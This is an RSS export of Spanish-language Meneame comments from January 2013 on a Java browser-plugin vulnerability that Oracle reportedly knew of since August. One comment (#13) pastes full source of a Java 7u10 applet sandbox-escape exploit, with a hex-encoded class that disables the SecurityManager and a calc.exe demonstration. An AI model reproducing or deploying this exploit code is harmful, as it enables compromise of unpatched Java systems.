		<title>#21 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c021#c-21</link>
		<pubDate>Sun, 13 Jan 2013 11:36:52 +0000</pubDate>
		<dc:creator>chachechichochu</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c021#c-21</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-9" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c09#c-9" rel="nofollow">#9</a> Esto tampoco pasa con COBOL, después hablan de querer reemplazarlo con X lenguaje, mas moderno y acorde a los tiempos...novatos</p><p>&#187;&nbsp;autor: <strong>chachechichochu</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114972</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>20</meneame:order>
		<meneame:user>quicksort</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#20 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c020#c-20</link>
		<pubDate>Sun, 13 Jan 2013 11:15:52 +0000</pubDate>
		<dc:creator>quicksort</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c020#c-20</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-16" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c016#c-16" rel="nofollow">#16</a> Se sigue usando mucho en intranets desgraciadamente y para cosas como certificados etc.. Primero fue ActiveX, luego Flash y ahora Java, todos los intentos de proveer un plugin de navegador que se integre mínimamente con el sistema han fracasado estrepitosamente en seguridad.</p><p>&#187;&nbsp;autor: <strong>quicksort</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114851</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>19</meneame:order>
		<meneame:user>--476--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>27</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#19 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c019#c-19</link>
		<pubDate>Sun, 13 Jan 2013 10:53:29 +0000</pubDate>
		<dc:creator>--476--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c019#c-19</guid>
		<description><![CDATA[<p>El problema está en el plugin que se usa en los navegadores y que distribuye Oracle, no &#34;en Java&#34; (el lenguaje), o en todas las implementaciones.<br />
<br />
&#34;an untrusted Java applet can escalate its privileges&#34; -- <a href="http://www.kb.cert.org/vuls/id/625617" title="www.kb.cert.org/vuls/id/625617" rel="nofollow">www.kb.cert.org/vuls/id/625617</a><br />
<br />
La solución es desactivar el plugin, que es lo que viene haciendo Mozilla en Firefox de un tiempo a esta parte. Para la mayoría no será una gran pérdida, pero es posible que algunas páginas web específicas (¿bancos quizás? personalmente he visto más temas basados en Active-X que en Java) requieran ejecutar applets en páginas web.</p><p>&#187;&nbsp;autor: <strong>--476--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114763</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>18</meneame:order>
		<meneame:user>--169265--</meneame:user>
		<meneame:votes>11</meneame:votes>
		<meneame:karma>102</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#18 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c018#c-18</link>
		<pubDate>Sun, 13 Jan 2013 10:30:15 +0000</pubDate>
		<dc:creator>--169265--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c018#c-18</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-13" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c013#c-13" rel="nofollow">#13</a> Me ha quedado bastante claro.</p><p>&#187;&nbsp;autor: <strong>--169265--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114733</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>17</meneame:order>
		<meneame:user>cmoft</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#17 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c017#c-17</link>
		<pubDate>Sun, 13 Jan 2013 10:22:10 +0000</pubDate>
		<dc:creator>cmoft</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c017#c-17</guid>
		<description><![CDATA[<p>&#34;<i>Until the company provides guidance or issues a patch, we recommend uninstalling Java if you don’t need it and disabling it if you do.</i>&#34;<br />
<br />
Ahora sí que recomiendan directamente desinstalar java.<br />
<br />
Lo que no me termina claro es lo del parche. Si lo he entendido bien, al intentar arreglar un fallo descubierto en agosto, lo hicieron de forma chapucera y dejaron abierta la puerta para usar esta vulnerabilidad. ¿Eso significa que la vulnerabilidad solo funciona en las versiones parcheadas, o que ya estaba en las anteriores y no la corrigieron?<br />
<br />
En cualquier caso, suena a que los de Oracle son ligeramente chapuzas (Aunque tampoco es ninguna sorpresa...)</p><p>&#187;&nbsp;autor: <strong>cmoft</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114728</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>16</meneame:order>
		<meneame:user>grails</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#16 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c016#c-16</link>
		<pubDate>Sun, 13 Jan 2013 10:21:08 +0000</pubDate>
		<dc:creator>grails</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c016#c-16</guid>
		<description><![CDATA[<p>Lo que tiene que hacer Oracle es mandar a tomar por cul* los applets y quitarlos directamente de Java 8, es una tecnología obsoleta y que casi nadie usa (los applets)</p><p>&#187;&nbsp;autor: <strong>grails</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114697</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>15</meneame:order>
		<meneame:user>demostenes</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#15 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c015#c-15</link>
		<pubDate>Sun, 13 Jan 2013 10:13:14 +0000</pubDate>
		<dc:creator>demostenes</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c015#c-15</guid>
		<description><![CDATA[<p>Y digo yo ¿y si Google implementara el motor Java de Android en Chrome y como plugin al resto de navegadores? Es un motor diferente al de Oracle y por lo tanto podrian hacerlo más seguro.</p><p>&#187;&nbsp;autor: <strong>demostenes</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114656</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>14</meneame:order>
		<meneame:user>--125581--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#14 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c014#c-14</link>
		<pubDate>Sun, 13 Jan 2013 10:03:07 +0000</pubDate>
		<dc:creator>--125581--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c014#c-14</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-12" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c012#c-12" rel="nofollow">#12</a> Luego está Fedora con SeLinux...</p><p>&#187;&nbsp;autor: <strong>--125581--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114530</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>13</meneame:order>
		<meneame:user>juanparati</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#13 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c013#c-13</link>
		<pubDate>Sun, 13 Jan 2013 09:28:38 +0000</pubDate>
		<dc:creator>juanparati</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c013#c-13</guid>
		<description><![CDATA[<p>El exploit en cuestion es algo como esto:<br />
<br />
/*<br />
Java 0day 1.7.0_10 decrypted source<br />
Originaly placed on <a href="https://damagelab.org/index.php?showtopic=23719&#38;st=0" title="damagelab.org/index.php?showtopic=23719&#38;st=0" rel="nofollow">damagelab.org/index.php?showtopic=23719&#38;st=0</a><br />
From Russia with love.<br />
*/<br />
<br />
import java.applet.Applet;<br />
<br />
import com.sun.jmx.mbeanserver.JmxMBeanServer;<br />
<br />
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;<br />
<br />
import com.sun.jmx.mbeanserver.MBeanInstantiator;<br />
<br />
import java.lang.invoke.MethodHandle;<br />
<br />
import java.lang.invoke.MethodHandles;<br />
<br />
import java.lang.invoke.MethodType;<br />
<br />
import java.lang.reflect.Method;<br />
<br />
public byte[] hex2Byte(String paramString)<br />
<br />
{<br />
    <br />
    byte[] arrayOfByte = new byte[paramString.length() / 2];<br />
    <br />
    for (int i = 0; i &#60; arrayOfByte.length; i++)<br />
    <br />
    {<br />
 <br />
 arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);<br />
 <br />
    }<br />
    <br />
    <br />
    <br />
    return arrayOfByte;<br />
    <br />
}<br />
<br />
public static String ByteArrayWithSecOff = &#38; <a class="tooltip c:1810678-34" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c034#c-34" rel="nofollow">#34</a>;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001<br />
00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501<br />
00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578<br />
63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F<br />
07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263<br />
6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F<br />
457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142<br />
0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469<br />
6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F<br />
50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445<br />
7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176<br />
612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A<br />
6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000<br />
020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100<br />
040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600<br />
02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107<br />
0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000<br />
02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600<br />
0000020017&#34;;<br />
<br />
<br />
<br />
public void init()<br />
<br />
{<br />
    <br />
    try<br />
    <br />
    {<br />
 <br />
 <br />
 <br />
 byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);<br />
 <br />
 JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();<br />
 <br />
 JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer(&#34;&#34;, null, null);<br />
 <br />
 MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();<br />
 <br />
 ClassLoader a = null;<br />
 <br />
 Class localClass1 = localMBeanInstantiator.findClass(&#34;sun.org.mozilla.javascript.internal.Context&#34;, a);<br />
 <br />
 Class localClass2 = localMBeanInstantiator.findClass(&#34;sun.org.mozilla.javascript.internal.GeneratedClassLoader&#34;, a);<br />
 <br />
 MethodHandles.Lookup localLookup = MethodHandles.publicLookup();<br />
 <br />
 MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });<br />
 <br />
 MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, &#34;findConstructor&#34;, localMethodType1);<br />
 <br />
 MethodType localMethodType2 = MethodType.methodType(Void.TYPE);<br />
 <br />
 MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });<br />
 <br />
 Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);<br />
 <br />
 MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });<br />
 <br />
 MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, &#34;findVirtual&#34;, localMethodType3);<br />
 <br />
 MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);<br />
 <br />
 MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, &#34;createClassLoader&#34;, localMethodType4 });<br />
 <br />
 Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });<br />
 <br />
 MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });<br />
 <br />
 MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,&#34;defineClass&#34;, localMethodType5 });<br />
 <br />
 Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });<br />
 <br />
 localClass3.newInstance();<br />
 <br />
 <br />
 <br />
 <br />
 <br />
 Runtime.getRuntime().exec(&#34;calc.exe&#34;);<br />
 <br />
 <br />
 <br />
    }<br />
    <br />
    catch (Throwable ex) {}<br />
    <br />
}<br />
<br />
}</p><p>&#187;&nbsp;autor: <strong>juanparati</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114511</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>12</meneame:order>
		<meneame:user>juanparati</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#12 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c012#c-12</link>
		<pubDate>Sun, 13 Jan 2013 09:24:01 +0000</pubDate>
		<dc:creator>juanparati</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c012#c-12</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-6" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c06#c-6" rel="nofollow">#6</a> Me temo que desafortunadamente sí, mira por ejemplo OpenSolaris y OS/400, otra cosa es que los sysadmins no suele utilizar servidores caros para navegar por Internet, por lo cual es bastante difícil que se ejecuten applets de Java, y si ademas le sumamos que las rutinas de infección del paypload deben ser compatibles para estas plataformas. Como extra de dificultad y teniendo en cuenta que se ejecute un applet y las rutinas de infección sean compatibles, Java va a estar ejecutándose en el user space de un usuario que probablemente no tenga permiso de escritura en los directorios del sistema tal como /etc, /usr, /bin o /var, como mucho infectará la carpeta del usuario.</p><p>&#187;&nbsp;autor: <strong>juanparati</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114499</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>11</meneame:order>
		<meneame:user>--324102--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#11 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c011#c-11</link>
		<pubDate>Sun, 13 Jan 2013 09:20:02 +0000</pubDate>
		<dc:creator>--324102--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c011#c-11</guid>
		<description><![CDATA[<p><a class="tooltip l:1810678" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde" rel="nofollow">#0</a>, el título que has puesto me parece un poco sensacionalista, la entradilla es más justa con el artículo.</p><p>&#187;&nbsp;autor: <strong>--324102--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114493</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>10</meneame:order>
		<meneame:user>--36895--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#10 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c010#c-10</link>
		<pubDate>Sun, 13 Jan 2013 09:18:17 +0000</pubDate>
		<dc:creator>--36895--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c010#c-10</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-5" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c05#c-5" rel="nofollow">#5</a> la solución pasa por encriptar las comunicaciones, e incluso las particiones de tu ordenador.</p><p>&#187;&nbsp;autor: <strong>--36895--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12114454</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>9</meneame:order>
		<meneame:user>oxelo</meneame:user>
		<meneame:votes>6</meneame:votes>
		<meneame:karma>61</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#9 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c09#c-9</link>
		<pubDate>Sun, 13 Jan 2013 09:01:31 +0000</pubDate>
		<dc:creator>oxelo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c09#c-9</guid>
		<description><![CDATA[<p>Esto con Python no pasa.</p><p>&#187;&nbsp;autor: <strong>oxelo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12113399</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>8</meneame:order>
		<meneame:user>--324579--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#8 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c08#c-8</link>
		<pubDate>Sat, 12 Jan 2013 22:03:17 +0000</pubDate>
		<dc:creator>--324579--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c08#c-8</guid>
		<description><![CDATA[<p>Hubo parche en Octubre.<br />
<br />
Aunque parece que no les salió bien del todo.</p><p>&#187;&nbsp;autor: <strong>--324579--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12112820</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>7</meneame:order>
		<meneame:user>AlwaysPadawan</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#7 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c07#c-7</link>
		<pubDate>Sat, 12 Jan 2013 19:59:49 +0000</pubDate>
		<dc:creator>AlwaysPadawan</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c07#c-7</guid>
		<description><![CDATA[<p>Contenido relacionado:<br />
<br />
<a href="http://www.javahispano.org/portada/2012/11/30/a-la-venta-zero-day-exploit-para-java-7-update-9-precio-de-v.html" title="www.javahispano.org/portada/2012/11/30/a-la-venta-zero-day-exploit-para-java-7-update-9-precio-de-v.html" rel="nofollow">www.javahispano.org/portada/2012/11/30/a-la-venta-zero-day-exploit-par</a></p><p>&#187;&nbsp;autor: <strong>AlwaysPadawan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111977</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>6</meneame:order>
		<meneame:user>--125581--</meneame:user>
		<meneame:votes>7</meneame:votes>
		<meneame:karma>76</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#6 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c06#c-6</link>
		<pubDate>Sat, 12 Jan 2013 17:04:01 +0000</pubDate>
		<dc:creator>--125581--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c06#c-6</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-4" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c04#c-4" rel="nofollow">#4</a> Es el JRE disponible en los Unix.</p><p>&#187;&nbsp;autor: <strong>--125581--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111893</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>5</meneame:order>
		<meneame:user>gelatti</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>26</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#5 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c05#c-5</link>
		<pubDate>Sat, 12 Jan 2013 16:40:38 +0000</pubDate>
		<dc:creator>gelatti</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c05#c-5</guid>
		<description><![CDATA[<p>Oracle, Microsoft, Apple y Google colaboran para que se pueda espiar a todos los ciudadanos del mundo por agencias gubernamentales.<br />
<br />
Linux la solución.</p><p>&#187;&nbsp;autor: <strong>gelatti</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111379</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>4</meneame:order>
		<meneame:user>jonolulu</meneame:user>
		<meneame:votes>12</meneame:votes>
		<meneame:karma>81</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#4 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c04#c-4</link>
		<pubDate>Sat, 12 Jan 2013 14:18:17 +0000</pubDate>
		<dc:creator>jonolulu</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c04#c-4</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-3" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c03#c-3" rel="nofollow">#3</a> OpenJDK es una plataforma de desarrollo de Java: no evita fallos de seguridad de la máquina virtual de Java</p><p>&#187;&nbsp;autor: <strong>jonolulu</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111318</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>3</meneame:order>
		<meneame:user>--170126--</meneame:user>
		<meneame:votes>5</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#3 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c03#c-3</link>
		<pubDate>Sat, 12 Jan 2013 14:04:11 +0000</pubDate>
		<dc:creator>--170126--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c03#c-3</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--170126--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111244</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>2</meneame:order>
		<meneame:user>jonolulu</meneame:user>
		<meneame:votes>14</meneame:votes>
		<meneame:karma>146</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#2 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c02#c-2</link>
		<pubDate>Sat, 12 Jan 2013 13:48:30 +0000</pubDate>
		<dc:creator>jonolulu</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c02#c-2</guid>
		<description><![CDATA[<p>Opciones<br />
A.- Se la sopla<br />
B.- Es un bug intencionado (como pasó con el de iTunes y su 0day que no arregló en tres años, y era usado por FinFisher para espiar ciudadanos)</p><p>&#187;&nbsp;autor: <strong>jonolulu</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12111218</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>1</meneame:order>
		<meneame:user>Sheldon_Cooper</meneame:user>
		<meneame:votes>17</meneame:votes>
		<meneame:karma>156</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#1 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c01#c-1</link>
		<pubDate>Sat, 12 Jan 2013 13:42:14 +0000</pubDate>
		<dc:creator>Sheldon_Cooper</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c01#c-1</guid>
		<description><![CDATA[<p>Igual pensareis que el tema de Java es cansino, y probablemente tendreis razón, pero me parece que el hecho de que fuera un bug conocido desde agosto es relevante.</p><p>&#187;&nbsp;autor: <strong>Sheldon_Cooper</strong></p>]]></description>
	</item>

</channel>
</rss>
